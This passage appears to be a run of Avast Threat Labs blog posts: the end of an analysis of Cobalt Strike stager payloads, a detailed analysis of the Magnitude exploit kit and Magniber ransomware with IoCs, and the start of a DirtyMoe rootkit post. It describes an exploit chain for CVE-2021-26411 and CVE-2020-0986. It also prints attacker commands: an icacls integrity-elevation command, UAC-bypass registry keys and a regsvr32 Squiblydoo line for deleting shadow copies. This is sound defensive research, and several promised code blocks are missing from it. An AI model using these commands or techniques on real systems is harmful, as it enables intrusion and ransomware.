Default payload size is 465 bytes plus length of Customer ID if present. Payload has the same position as the SOCKADDR_IN structure such as TCP Bind x64 payload so we can reuse parsing code again.

Default TCP Reverse x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6174a599 ws2_32.dll_connect
0x016b 0x5fc8d902 ws2_32.dll_recv
0x018b 0xe553a458 kernel32.dll_VirtualAlloc
0x01a5 0x5fc8d902 ws2_32.dll_recv
0x01c1 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Reverse x64 stagers:

HTTP stagers x86 and x64

Default x86 payload size fits 780 bytes and the x64 version is 874 bytes long plus size of request address string and size of Customer ID if present. The payloads include full request information stored inside multiple placeholders.

Request address

The request address is a plaintext string terminated by null byte located right after the last payload instruction without any padding. The offset for the x86 version is 0x030C and 0x036A for the x64 payload version. Typical format is IPv4.

Request port

For the x86 version the request port value is hardcoded inside a PUSH instruction as a  dword. The offset for the PUSH instruction is 0x00BE. The port value for the x64 version is stored inside MOV r8d, dword instruction on offset 0x010D.

Request query

The placeholder for the request query has a max size of 80 bytes and the value is a plaintext string terminated by a null byte. If the request query string is shorter, then the rest of the string space is filled with junk bytes. The placeholder offset for the x86 version is 0x0143 and 0x0186 for the x64 version.

Cobalt Strike and other tools such as Metasploit use a trivial checksum8 algorithm for the request query to distinguish between x86 and x64 payload or beacon. 

According to leaked Java web server source code,  Cobalt Strike uses only two checksum values, 0x5C (92) for x86 payloads and 0x5D for x64 versions. There are also implementations of Strict stager variants where the request query string must be 5 characters long (including slash). The request query checksum feature isn’t mandatory.

Python implementation of checksum8 algorithm:

Metasploit server uses similar values:

You can find a complete list of Cobalt Strike’s x86 and x64 strict request queries here.

Request header

The size of the request header placeholder is 304 bytes and the value is also represented as a plaintext string terminated by a null byte. The request header placeholder is located immediately after the Request query placeholder. The offset for the x86 version is 0x0193 and 0x01D6 for the x64 version.

The typical request header value for HTTP/HTTPS stagers is User-Agent. The Cobalt Strike web server has banned user-agents which start with lynx, curl or wget and return a response code 404 if any of these strings are found.

API function HttpOpenRequestA is called with following dwFlags (0x84600200):

Python parsing:

Default HTTP x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00aa 0xa779563a wininet.dll_InternetOpenA
0x00c6 0xc69f8957 wininet.dll_InternetConnectA
0x00de 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x00f2 0x7b18062d wininet.dll_HttpSendRequestA
0x010b 0x5de2c5aa kernel32.dll_GetLastError
0x0114 0x315e2145 user32.dll_GetDesktopWindow
0x0123 0x0be057b7 wininet.dll_InternetErrorDlg
0x02c4 0x56a2b5f0 kernel32.dll_ExitProcess
0x02d8 0xe553a458 kernel32.dll_VirtualAlloc
0x02f3 0xe2899612 wininet.dll_InternetReadFile

Default HTTP x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0120 0xc69f8957 wininet.dll_InternetConnectA
0x013f 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0163 0x7b18062d wininet.dll_HttpSendRequestA
0x0308 0x56a2b5f0 kernel32.dll_ExitProcess
0x0324 0xe553a458 kernel32.dll_VirtualAlloc
0x0342 0xe2899612 wininet.dll_InternetReadFile

Yara rules for HTTP x86 and x64 stagers:

HTTPS stagers x86 and x64

The payload structure and placeholders are almost the same as the HTTP stagers. The differences are only in payload sizes, placeholder offsets, usage of InternetSetOptionA API function (API hash 0x869e4675) and different dwFlags for calling the HttpOpenRequestA API function.

The default x86 payload size fits 817 bytes and the default for the x64 version is 909 bytes long plus size of request address string and size of the Customer ID if present.

Request address

The placeholder offset for the x86 version is 0x0331 and 0x038D for the x64 payload version. The typical format is IPv4.

Request port

The hardcoded request port format is the same as HTTP.  The PUSH offset for the x86 version is 0x00C3. The MOV instruction for x64 version is on offset 0x0110.

Request query

The placeholder for the request query has the same format and length as the HTTP version. The placeholder offset for the x86 version is 0x0168 and 0x01A9 for the x64 version.

Request header

The size and length of the request header placeholder is the same as the HTTP version. Offset for the x86 version is 0x01B8 and 0x01F9 for the x64 version.

API function HttpOpenRequestA is called with following dwFlags (0x84A03200):

InternetSetOptionA API function is called with following parameters:

Python parsing:

Default HTTPS x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00af 0xa779563a wininet.dll_InternetOpenA
0x00cb 0xc69f8957 wininet.dll_InternetConnectA
0x00e7 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0100 0x869e4675 wininet.dll_InternetSetOptionA
0x0110 0x7b18062d wininet.dll_HttpSendRequestA
0x0129 0x5de2c5aa kernel32.dll_GetLastError
0x0132 0x315e2145 user32.dll_GetDesktopWindow
0x0141 0x0be057b7 wininet.dll_InternetErrorDlg
0x02e9 0x56a2b5f0 kernel32.dll_ExitProcess
0x02fd 0xe553a458 kernel32.dll_VirtualAlloc
0x0318 0xe2899612 wininet.dll_InternetReadFile

Default HTTPS x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0123 0xc69f8957 wininet.dll_InternetConnectA
0x0142 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x016c 0x869e4675 wininet.dll_InternetSetOptionA
0x0186 0x7b18062d wininet.dll_HttpSendRequestA
0x032b 0x56a2b5f0 kernel32.dll_ExitProcess
0x0347 0xe553a458 kernel32.dll_VirtualAlloc
0x0365 0xe2899612 wininet.dll_InternetReadFile

Yara rule for HTTPS x86 and x64 stagers:

The next stage or beacon could be easily downloaded via curl or wget tool:

You can find our parser for Raw Payloads and all according yara rules in our IoC repository.

Raw Payloads encoding

Cobalt Strike also includes a payload generator for exporting raw stagers and payload in multiple encoded formats. Encoded formats support UTF-8 and UTF-16le. 

Table of the most common encoding with usage and examples:

Encoding Usage Example
Hex VBS, HTA 4d5a9000..
Hex Array PS1 0x4d, 0x5a, 0x90, 0x00..
Hex Veil PY \x4d\x5a\x90\x00..
Decimal Array VBA -4,-24,-119,0..
Char Array VBS, HTA Chr(-4)&”H”&Chr(-125)..
Base64 PS1 38uqIyMjQ6..
gzip / deflate compression PS1
Xor PS1, Raw payloads, Beacons

Decoding most of the formats are pretty straightforward, but there are few things to consider. 

  • Values inside Decimal and Char Array are splitted via “new lines” represented by “\s_\n” (\x20\x5F\x0A). 
  • Common compression algorithms used inside PowerShell scripts are GzipStream and raw DeflateStream.

Python decompress implementation:

XOR encoding

The XOR algorithm is used in three different cases. The first case is one byte XOR inside PS1 scripts, default value is 35 (0x23).

The second usage is XOR with dword key for encoding raw payloads or beacons inside PE stagers binaries. Specific header for xored data is 16 bytes long and includes start offset, xored data size, XOR key and four 0x61 junk/padding bytes.

Python header parsing:

We can create Yara rule based on XOR key from header and first dword of encoded data to verify supposed values there:

The third case is XOR encoding with a rolling dword key, used only for decoding downloaded beacons. The encoded data blob is located right after the XOR algorithm code without any padding. The encoded data starts with an initial XOR key (dword) and the data size (dword xored with init key).

There are x86 and x64 implementations of the XOR algorithm. Cobalt Strike resource includes xor.bin and xor64.bin files with precompiled XOR algorithm code. 

Default lengths of compiled x86 code are 52 and 56 bytes (depending on used registers) plus the length of the junk bytes. The x86 implementation allows using different register sets, so the xor.bin file includes more than 800 different precompiled code variants.

Yara rule for covering all x86 variants with XOR verification:

The precompiled x64 code is 63 bytes long with no junk bytes. There is also only one precompiled code variant.

Yara rule for x64 variant with XOR verification:

You can find our Raw Payload decoder and extractor for the most common encodings here. It uses a parser from the previous chapter and it could save your time and manual work. We also provide an IDAPython script for easy raw payload analysis.


As we see more and more abuse of Cobalt Strike by threat actors, understanding how to decode its use is important for malware analysis.

In this blog, we’ve focused on understanding how threat actors use Cobalt Strike payloads and how you can analyze them.

The next part of this series will be dedicated to Cobalt Strike beacons and parsing its configuration structure.

The post Decoding Cobalt Strike: Understanding Payloads appeared first on Avast Threat Labs.

Magnitude Exploit Kit: Still Alive and Kicking

29 July 2021 at 16:30

If I could choose one computer program and erase it from existence, I would choose Internet Explorer. Switching to a different browser would most likely save countless people from getting hacked. Not to mention all the headaches that web developers get when they are tasked with solving Internet Explorer compatibility issues. Unfortunately, I do not have the power to make Internet Explorer disappear. But seeing its browser market share continue to decline year after year at least gives me hope that one day it will be only a part of history.

While the overall trend looks encouraging, there are still some countries where the decline in Internet Explorer usage is lagging behind. An interesting example of this is South Korea, where until recently, users often had no choice but to use this browser if they wanted to visit a government or an e-commerce website. This was because of a law that seems very bizarre from today’s point of view: these websites were required to use ActiveX controls and were therefore only supported in Internet Explorer. Ironically, these controls were originally meant to provide additional security. While this law was finally dismantled in December 2020, Internet Explorer still has a lot of momentum in South Korea today. 

The attackers behind the Magnitude Exploit Kit (or Magniťůdek as we like to call it) are exploiting this momentum by running malicious ads that are currently shown only to South Korean Internet Explorer users. The ads can mostly be found on adult websites, which makes this an example of so-called adult malvertising. They contain code that exploits known vulnerabilities in order to give the attackers control over the victim’s computer. All the victim has to do is use a vulnerable version of Microsoft Windows and Internet Explorer, navigate to a page that hosts one of these ads and they will get the Magniber ransomware encrypting their computer.

The daily amount of Avast users protected from Magnitude. Note the drop after July 9th, which is when the attacker’s account at one of the abused ad networks got terminated.


The Magnitude exploit kit, originally known as PopAds, has been around since at least 2012, which is an unusually long lifetime for an exploit kit. However, it’s not the same exploit kit today that it was nine years ago. Pretty much every part of Magnitude has changed multiple times since then. The infrastructure has changed, so has the landing page, the shellcode, the obfuscation, the payload, and most importantly, the exploits. Magnitude currently exploits an Internet Explorer memory corruption vulnerability, CVE-2021-26411, to get shellcode execution inside the renderer process and a Windows memory corruption vulnerability, CVE-2020-0986, to subsequently elevate privileges. A fully functional exploit for CVE-2021-26411 can be found on the Internet and Magnitude uses that public exploit directly, just with some added obfuscation on top. According to the South Korean cybersecurity company ENKI, this CVE was first used in a targeted attack against security researchers, which Google’s Threat Analysis Group attributed to North Korea.

Exploiting CVE-2020-0986 is a bit less straightforward. This vulnerability was first used in a zero-day exploit chain, discovered in-the-wild by Kaspersky researchers who named the attack Operation PowerFall. To the best of our knowledge, this is the first time this vulnerability is being exploited in-the-wild since that attack. Details about the vulnerability were provided in blog posts by both Kaspersky and Project Zero. While both these writeups contain chunks of the exploit code, it must have still been a lot of work to develop a fully functional exploit. Since the exploit from Magnitude is extremely similar to the code from the writeups, we believe that the attackers started from the code provided in the writeup and then added all the missing pieces to get a working exploit.

Interestingly, when we first discovered Magnitude exploiting CVE-2020-0986, it was not weaponized with any malicious payload. All it did after successful exploitation was ping its C&C server with the Windows build number of the victim. At the time, we theorized that this was just a testing version of the exploit and the attackers were trying to figure out which builds of Windows they could exploit before they fully integrated it into the exploit kit. And indeed, a week later we saw an improved version of the exploit and this time, it was carrying the Magniber ransomware as the payload.

Until recently, our detections for Magnitude were protecting on average about a thousand Avast users per day. That number dropped to roughly half after the compliance team of one of the ad networks used by Magnitude kicked the attackers out of their platform. Currently, all the protected users have a South Korean IP address, but just a few weeks back, Taiwanese Internet users were also at risk. Historically, South Korea and Taiwan were not the only countries attacked by Magnitude. Previous reports mention that Magnitude also used to target Hong Kong, Singapore, the USA, and Malaysia, among others. 

The Infrastructure

The Magnitude operators are currently buying popunder ads from multiple adult ad networks. Unfortunately, these ad networks allow them to very precisely target the ads to users who are likely to be vulnerable to the exploits they are using. They can only pay for ads shown to South Korean Internet Explorer users who are running selected versions of Microsoft Windows. This means that a large portion of users targeted by the ads is vulnerable and that the attackers do not have to waste much money on buying ads for users that they are unable to exploit. We reached out to the relevant ad networks to let them know about the abuse of their platforms. One of them successfully terminated the attacker’s account, which resulted in a clear drop in the number of Avast users that we had to protect from Magnitude every day.

Many ad networks allow the advertisers to target their ads only to IE users running specific versions of Windows.

When the malicious ad is shown to a victim, it redirects them through an intermediary URL to a page that serves an exploit for CVE-2021-26411. An example of this redirect chain is binlo[.]info -> fab9z1g6f74k.tooharm[.]xyz -> 6za16cb90r370m4u1ez.burytie[.]top. The first domain, binlo[.]info, is the one that is visible to the ad network. When this domain is visited by someone not targeted by the campaign, it just presents a legitimate-looking decoy ad. We believe that the purpose of this decoy ad is to make the malvertising seem legitimate to the ad network. If someone from the ad network were to verify the ad, they would only see the decoy and most likely conclude that it is legitimate.

One of the decoy ads used by Magnitude. Note that this is nothing but a decoy: there is no reason to believe that SkinMedica would be in any way affiliated with Magnitude.

The other two domains (tooharm[.]xyz and burytie[.]top) are designed to be extremely short-lived. In fact, the exploit kit rotates these domains every thirty minutes and doesn’t reuse them in any way. This means that the exploit kit operators need to register at least 96 domains every day! In addition to that, the subdomains (fab9z1g6f74k.tooharm[.]xyz and 6za16cb90r370m4u1ez.burytie[.]top) are uniquely generated per victim. This makes the exploit kit harder to track and protect against (and more resilient against takedowns) because detection based on domain names is not very effective.

The JavaScript exploit for CVE-2021-26411 is obfuscated with what appears to be a custom obfuscator. The obfuscator is being updated semi-regularly, most likely in an attempt to evade signature-based detection. The obfuscator is polymorphic, so each victim gets a uniquely obfuscated exploit. Other than that, there are not many interesting things to say about the obfuscation, it does the usual things like hiding string/numeric constants, renaming function names, hiding function calls, and more. 

A snippet of the obfuscated JavaScript exploit for CVE-2021-26411

After deobfuscation, this exploit is an almost exact match to a public exploit for CVE-2021-26411 that is freely available on the Internet. The only important change is in the shellcode, where Magnitude obviously provides its own payload. 


The shellcode is sometimes wrapped in a simple packer that uses redundant jmp instructions for obfuscation. This obfuscates every function by randomizing the order of instructions and then adding a jmp instruction between each two consecutive instructions to preserve the original control flow. As with other parts of the shellcode, the order is randomly generated on the fly, so each victim gets a unique copy of the shellcode.

Function obfuscated by redundant jmp instructions. It allocates memory by invoking the NtAllocateVirtualMemory syscall.

As shown in the above screenshot, the exploit kit prefers not to use standard Windows API functions and instead often invokes system calls directly. The function above uses the NtAllocateVirtualMemory syscall to allocate memory. However, note that this exact implementation only works on Windows 10 under the WoW64 subsystem. On other versions of Windows, the syscall numbers are different, so the syscall number 0x18 would denote some other syscall. And this exact implementation also wouldn’t work on native 32-bit Windows, because there it does not make sense to call the FastSysCall pointer at FS:[0xC0]

To get around these problems, this shellcode comes in several variants, each custom-built for a specific version of Windows. Each variant then contains hardcoded syscall numbers fitting the targeted version. Magnitude selects the correct shellcode variant based on the User-Agent string of the victim. But sometimes, knowing the major release version and bitness of Windows is not enough to deduce the correct syscall numbers. For instance, the syscall number for NtOpenProcessToken on 64-bit Windows 10 differs between versions 1909 and 20H2. In such cases, the shellcode obtains the victim’s exact NtBuildNumber from KUSER_SHARED_DATA and uses a hardcoded mapping table to resolve that build number into the correct syscall number. 

Currently, there are only three variants of the shellcode. One for Windows 10 64-bit, one for Windows 7 64-bit, and one for Windows 7 32-bit. However, it is very much possible that additional variants will get implemented in the future.

To facilitate frequent syscall invocation, the shellcode makes use of what we call syscall templates. Below, you can see the syscall template it uses in the WoW64 Windows 10 variant. Every time the shellcode is about to invoke a syscall, it first customizes this template for the syscall it intends to invoke by patching the syscall number (the immediate in the first instruction) and the immediates from the retn instructions (which specify the number of bytes to release from the stack on function return). Once the template is customized, the shellcode can call it and it will invoke the desired syscall. Also, note the branching based on the value at offset 0x254 of the Process Environment Block. This is most likely the malware authors trying to check a field sometimes called dwSystemCallMode to find out if the syscall should be invoked directly using int 0x2e or through the FastSysCall transition.

Syscall template from the WoW64 Windows 10 variant

Now that we know how the shellcode is obfuscated and how it invokes syscalls, let’s get to what it actually does. Note that the shellcode expects to run within the IE’s Enhanced Protected Mode (EPM) sandbox, so it is relatively limited in what it can do. However, the EPM sandbox is not as strict as it could be, which means that the shellcode still has limited filesystem access, public network access and can successfully call many API functions. Magnitude wants to get around the restrictions imposed by the sandbox and so the shellcode primarily functions as a preparation stage for the LPE exploit which is intended to enable Magnitude to break out of the sandbox.

The first thing the shellcode does is that it obtains the integrity level of the current process. There are two URLs embedded in the shellcode and the integrity level is used to determine which one should be used. Both URLs contain a subdomain that is generated uniquely per victim and are protected so that only the intended victim will get any response from them. If the integrity level is Low or Untrusted, the shellcode reaches out to the first URL and downloads an encrypted LPE exploit from there. The exploit is then decrypted using a simple xor-based cipher, mapped into executable memory, and executed.

On the other hand, if the integrity level is Medium or higher, the shellcode determines that it is not running in a sandbox and it skips the LPE exploit. In such cases, it downloads the final payload (currently Magniber ransomware) from the second URL, decrypts it, and then starts searching for a process that it could inject this payload into. For the 64-bit Windows shellcode variants, the target process needs to satisfy all of the following conditions:

  • The target process name is not iexplore.exe
  • The integrity level of the target process is not Low or Untrusted
  • The integrity level of the target process is not higher than the integrity level of the current process
  • The target process is not running in the WoW64 environment
  • (The target process can be opened with PROCESS_QUERY_INFORMATION)

Once a suitable target process is found, the shellcode jumps through the Heaven’s Gate (only in the WoW64 variants) and injects the payload into the target process using the following sequence of syscalls: NtOpenProcess -> NtCreateSection -> NtMapViewOfSection -> NtCreateThreadEx -> NtGetContextThread -> NtSetContextThread -> NtResumeThread. Note that in this execution chain, everything happens purely in memory and this is why Magnitude is often described as a fileless exploit kit. However, the current version is not entirely fileless because, as will be shown in the next section, the LPE exploit drops a helper PE file to the filesystem.

The shellcode’s transition through the heaven’s gate


Magnitude escapes the EPM sandbox by exploiting CVE-2020-0986, a memory corruption vulnerability in splwow64.exe. Since the vulnerable code is running with medium integrity and a low integrity process can trigger it using Local Procedure Calls (LPC), this vulnerability can be used to get from the EPM sandbox to medium integrity. CVE-2020-0986 and the ways to exploit it are already discussed in detail in blog posts by both Kaspersky and Project Zero. This section will therefore focus on Magnitude’s implementation of the exploit, please refer to the other blog posts for further technical details about the vulnerability. 

The vulnerable code from gdi32.dll can be seen below. It is a part of an LPC server and it can be triggered by an LPC call, with both r8 and rdi pointing into a memory section that is shared between the LPC client and the LPC server. This essentially gives the attacker the ability to call memcpy inside the splwow64 process while having control over all three arguments, which can be immediately converted into an arbitrary read/write primitive. Arbitrary read is just a call to memcpy with the dest being inside the shared memory and src being the target address. Conversely, arbitrary write is a call to memcpy with the dest being the target address and the src being in the shared memory.

The vulnerable code from gdi32.dll. When it gets executed, both r8 and rdi are pointing into attacker-controllable memory.

However, there is one tiny problem that makes exploitation a bit more difficult. As can be seen in the disassembled code above, the count of the memcpy is obtained by adding the dereferenced content of two word pointers, located close by the src address. This is not a problem for (smaller) arbitrary writes, since the attacker can just plant the desired count beforehand into the shared memory. But for arbitrary reads, the count is not directly controllable by the attacker and it can be anywhere between 0 and 0x1FFFE, which could either crash splwow64 or perform a memcpy with either zero or a smaller than desired count. To get around this, the attacker can perform arbitrary reads by triggering the vulnerable code twice. The first time, the vulnerability can be used as an arbitrary write to plant the correct count at the necessary offset and the second time, it can be used to actually read the desired memory content. This technique has some downsides, such as that it cannot be used to read non-writable memory, but that is not an issue for Magnitude.

The exploit starts out by creating a named mutex to make sure that there is only a single instance of it running. Then, it calls CreateDCW to spawn the splwow64 process that is to be exploited and performs all the necessary preparations to enable sending LPC messages to it later on. The exploit also contains an embedded 64-bit PE file, which it drops to %TEMP% and executes from there. This PE file serves two different purposes and decides which one to fulfill based on whether there is a command-line argument or not. The first purpose is to gather various 64-bit pointers and feed them back to the main exploit module. The second purpose is to serve as a loader for the final payload once the vulnerability has been successfully exploited.

There are three pointers that are obtained by the dropped 64-bit PE file when it runs for the first time. The first one is the address of fpDocumentEvent, which stores a pointer to DocumentEvent, protected using the EncodePointer function. This pointer is obtained by scanning gdi32.dll (or gdi32full.dll) for a static sequence of instructions that set the value at this address. The second pointer is the actual address of DocumentEvent, as exported from winspool.drv and the third one is the pointer to system, exported from msvcrt.dll. Once the 64-bit module has all three pointers, it drops them into a temporary file and terminates itself.

The exploit scans gdi32.dll for the sequence of the four underlined instructions and extracts the address of fpDocumentEvent from the operands of the last instruction.
The exploit extracting the address of fpDocumentEvent from gdi32.dll

The main 32-bit module then reads the dropped file and uses the obtained values during the actual exploitation, which can be characterized by the following sequence of actions:

  1. The exploit leaks the value at the address of fpDocumentEvent in the splwow64 process. The value is leaked by sending two LPC messages, using the arbitrary read primitive described above.
  2. The leaked value is an encoded pointer to DocumentEvent. Using this encoded pointer and the actual, raw, pointer to DocumentEvent, the exploit cracks the secret value that was used for pointer encoding. Read the Kaspersky blog post for how this can be done.
  3. Using the obtained secret value, the exploit encodes the pointer to system, so that calling the function DecodePointer on this newly encoded value inside splwow64 will yield the raw pointer to system.
  4. Using the arbitrary write primitive, the exploit overwrites fpDocumentEvent with the encoded pointer to system.
  5. The exploit triggers the vulnerable code one more time. Only this time, it is not interested in any memory copying, so it sets the count for memcpy to zero. Instead, it counts on the fact that splwow64 will try to decode and call the pointer at fpDocumentEvent. Since this pointer was substituted in the previous step, splwow64 will call system instead of DocumentEvent. The first argument to DocumentEvent is read from the shared memory section, which means that it is controllable by the attacker, who can therefore pass an arbitrary command to system
  6. Finally, the exploit uses the arbitrary write primitive one last time and restores fpDocumentEvent to its original value. This is an attempt to clean up after the exploit, but splwow64 might still be unstable because a random pointer got corrupted when the exploit planted the necessary count of the leak during the first step.
The exploit cracking the secret used for encoding fpDocumentEvent

The command that Magnitude executes in the call to system looks like this:

icacls <dropped_64bit_PE> /Q /C /setintegritylevel Medium && <dropped_64bit_PE>

This elevates the dropped 64-bit PE file to medium integrity and executes it for the second time. This time, it will not gather any pointers, but it will instead extract an embedded payload from within itself and inject it into a suitable process. Currently, the injected payload is the Magniber ransomware.


Magniber emerged in 2017 when Magnitude started deploying it as a replacement for the Cerber ransomware. Even though it is almost four years old, it still gets updated frequently and so a lot has changed since it was last written about. The early versions featured server-side AES key generation and contained constant fallback encryption keys in case the server was unreachable. A decryptor that worked when encryption was performed using these fallback keys was developed by the Korea Internet & Security Agency and published on No More Ransom. The attackers responded to this by updating Magniber to generate the encryption keys locally, but the custom PRNG based on GetTickCount was very weak, so researchers from Kookmin University were able to develop a method to recover the encrypted files. Unfortunately, Magniber got updated again, and it is currently using the custom PRNG shown below. This function is used to generate a single random byte and it is called 32 times per encrypted file (16 times to generate the AES-128 key and 16 times to generate the IV). 

While this PRNG still looks very weak at first glance, we believe there is no reasonably efficient method to attack it. The tick count is not the problem here: it is with extremely high probability going to be constant throughout all iterations of the loop and its value could be guessed by inspecting event logs and timestamps of the encrypted files. The problem lies in the RtlRandomEx function, which gets called 640 times (2 * 10 * (16 + 16)) per each encrypted file. This means that the function is likely going to get called millions of times during encryption and leaking and tracking its internal state throughout all of these calls unfortunately seems infeasible. At best, it might be possible to decrypt the first few encrypted files. And even that wouldn’t be possible on newer CPUs and Windows versions, because RtlRandomEx there internally uses the rdrand instruction, which arguably makes this a somewhat decent PRNG for cryptography. 

The PRNG used by Magniber to generate encryption keys

The ransomware starts out by creating a named mutex and generating an identifier from the victim’s computer name and volume serial number. Then, it enumerates in random order all logical drives that are not DRIVE_NO_ROOT_DIR or DRIVE_CDROM and proceeds to recursively traverse them to encrypt individual files. Some folders, such as sample music or tor browser, are excluded from encryption, same as all hidden, system, readonly, temporary, and virtual files. The full list of excluded folders can be found in our IoC repository.

Just like many other ransomware strains, Magniber only encrypts files with certain preselected extensions, such as .doc or .xls. Its configuration contains two sets of extension hashes and each file gets encrypted only if the hash of its extension can be found in one of these sets. The division into two sets was presumably done to assign priority to the extensions. Magniber goes through the whole filesystem in two sweeps. In the first one, it encrypts files with extensions from the higher-priority set. In the second sweep, it encrypts the rest of the files with extensions from the lower-priority set. Interestingly, the higher-priority set also contains nine extensions that were additionally obfuscated, unlike the rest of the higher-priority set. It seems that the attackers were trying to hide these extensions from reverse engineers. You can find these and the other extensions that Magniber encrypts in our IoC repository.

To encrypt a file, Magniber first generates a random 128-bit AES key and IV using the PRNG discussed above. For some bizarre reason, it only chooses to generate bytes from the range 0x03 to 0xFC, effectively reducing the size of the keyspace from 25616 to 25016. Magniber then reads the input file by chunks of up to 0x100000 bytes, continuously encrypting each chunk in CBC mode and writing it back to the input file. Once the whole file is encrypted, Magniber also encrypts the AES key and IV using a public RSA key embedded in the sample and appends the result to the encrypted file. Finally, Magniber renames the file by appending a random-looking extension to its name.

However, there is a bug in the encryption process that puts some encrypted files into a nonrecoverable state, where it is impossible to decrypt them, even for the attackers who possess the corresponding private RSA key. This bug affects all files with a size that is a multiple of 0x100000 (1 MiB). To understand this bug, let’s first investigate in more detail how individual files get encrypted. Magniber splits the input file into chunks and treats the last chunk differently. When the last chunk is encrypted, Magniber sets the Final parameter of CryptEncrypt to TRUE, so CryptoAPI can add padding and finalize the encryption. Only after the last chunk gets encrypted does Magniber append the RSA-encrypted AES key to the file. 

The bug lies in how Magniber determines that it is currently encrypting the last chunk: it treats only chunks of size less than 0x100000 as the last chunks. But this does not work for files the size of which is a multiple of 0x100000, because even the last chunk of such files contains exactly 0x100000 bytes. When Magniber is encrypting such files, it never registers that it is encrypting the last chunk, which causes two problems. The first problem is that it never calls CryptEncrypt with Final=TRUE, so the encrypted files end up with invalid padding. The second, much bigger, problem is that Magniber also does not append the RSA-encrypted AES key, because the trigger for appending it is the encryption of the last chunk. This means that the AES key and IV used for the encryption of the file get lost and there is no way to decrypt the file without them.

Magniber’s ransom note

Magniber drops its ransom note into every folder where it encrypted at least one file. An extra ransom note is also dropped into %PUBLIC% and opened up automatically in notepad.exe after encryption. The ransom note contains several URLs leading the victims to the payment page, which instructs them on how to pay the ransom in order to obtain the decryptor. These URLs are unique per victim, with the subdomain representing the victim identifier. Magniber also automatically opens up the payment page in the victim’s browser and while doing so, exfiltrates further information about the ransomware deployment through the URL, such as:

  • The number of encrypted files
  • The total size of all encrypted files
  • The number of encrypted logical drives
  • The number of files encountered (encrypted or not)
  • The version of Windows
  • The victim identifier
  • The version of Magniber

Finally, Magniber attempts to delete shadow copies using a UAC bypass. It writes a command to delete them to HKCU\Software\Classes\mscfile\shell\open\command and then executes CompMgmtLauncher.exe assuming that this will run the command with elevated privileges. But since this particular UAC bypass method was fixed in Windows 10, Magniber also contains another bypass method, which it uses exclusively on Windows 10 machines. This other method works similarly, writing the command to HKCU\Software\Classes\ms-settings\shell\open\command, creating a key named DelegateExecute there, and finally running ComputerDefaults.exe. Interestingly, the command used is regsvr32.exe scrobj.dll /s /u /n /i:%PUBLIC%\readme.txt. This is a technique often referred to as Squiblydoo and it is used to run a script dropped into readme.txt, which is shown below.

The scriptlet dropped to readme.txt, designed to delete shadow copies


In this blog post, we examined in detail the current state of the Magnitude exploit kit. We described how it exploits CVE-2021-26411 and CVE-2020-0986 to deploy ransomware to unfortunate victims who browse the Internet using vulnerable builds of Internet Explorer. We found Magnitude to be a mature exploit kit with a very robust infrastructure. It uses thousands of fresh domains each month and its infection chain is composed of seven stages (not even counting the multiple obfuscation layers). The infrastructure is also well protected, which makes it very challenging for malware analysts to track and research the exploit kit.

We also dug deep into the Magniber ransomware. We found a bug that results in some files being encrypted in such a way that even the attackers can not possibly decrypt them. This underscores the unfortunate fact that paying the ransom is never a guarantee to get the ransomed files back. This is one of the reasons why we urge ransomware victims to try to avoid paying the ransom. 

Even though the attackers behind Magnitude appear to have a good grasp on exploit development, obfuscation, and protection of malicious infrastructure, they seem to have no idea what they are doing when it comes to generating random numbers for cryptographic purposes. This resulted in previous versions of Magniber using flawed PRNGs, which allowed malware researchers to develop decryptors that helped victims recover their ransomed files. However, Magniber was always quick to improve their PRNG, which unfortunately made the decryptors obsolete. The current version of Magniber is using a PRNG that seems to be just secure enough, which makes us believe that there will be no more decryptors in the future.

Indicators of Compromise (IoC)

The full list of IoCs is available at

Redirection page
SHA-256 Note
5d0e45febd711f7564725ac84439b74d97b3f2bc27dbe5add5194f5cdbdbf623 Win10 WoW64 variant
351a2e8a4dc2e60d17208c9efb6ac87983853c83dae5543e22674a8fc5c05234 ^ unpacked
4044008da4fc1d0eb4a0242b9632463a114b2129cedf9728d2d552e379c08037 Win7 WoW64 variant
1ea23d7456195e8674baa9bed2a2d94c7235d26a574adf7009c66d6ec9c994b3 ^ unpacked
3de9d91962a043406b542523e11e58acb34363f2ebb1142d09adbab7861c8a63 Win7 native variant
dfa093364bf809f3146c2b8a5925f937cc41a99552ea3ca077dac0f389caa0da ^ unpacked
e05a4b7b889cba453f02f2496cb7f3233099b385fe156cae9e89bc66d3c80a7f newer Win7 WoW64 variant
ae930317faf12307d3fb9a534fe977a5ef3256e62e58921cd4bf70e0c05bf88a latest Win7 WoW64 variant
SHA-256 Note
440be2c75d55939c90fc3ef2d49ceeb66e2c762fd4133c935667b3b2c6fb8551 pingback payload
a5edae721568cdbd8d4818584ddc5a192e78c86345b4cdfb4dc2880b9634acab pingback payload
1505368c8f4b7bf718ebd9a44395cfa15657db97a0c13dcf47eb8cfb94e7528b Magniber payload
63525e19aad0aae1b95c3a357e96c93775d541e9db7d4635af5363d4e858a345 Magniber payload
31e99c8f68d340fd046a9f6c8984904331dc6a5aa4151608058ee3aabc7cc905 Magniber payload
Pointer scanner/loader 64-bit module

Decoy ad domains

The post Magnitude Exploit Kit: Still Alive and Kicking appeared first on Avast Threat Labs.

DirtyMoe: Rootkit Driver

11 August 2021 at 09:44


In the first post DirtyMoe: Introduction and General Overview of Modularized Malware, we have described one of the complex and sophisticated malware called DirtyMoe. The main observed roles of the malware are Cryptojacking and DDoS attacks that are still popular. There is no doubt that malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems where the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

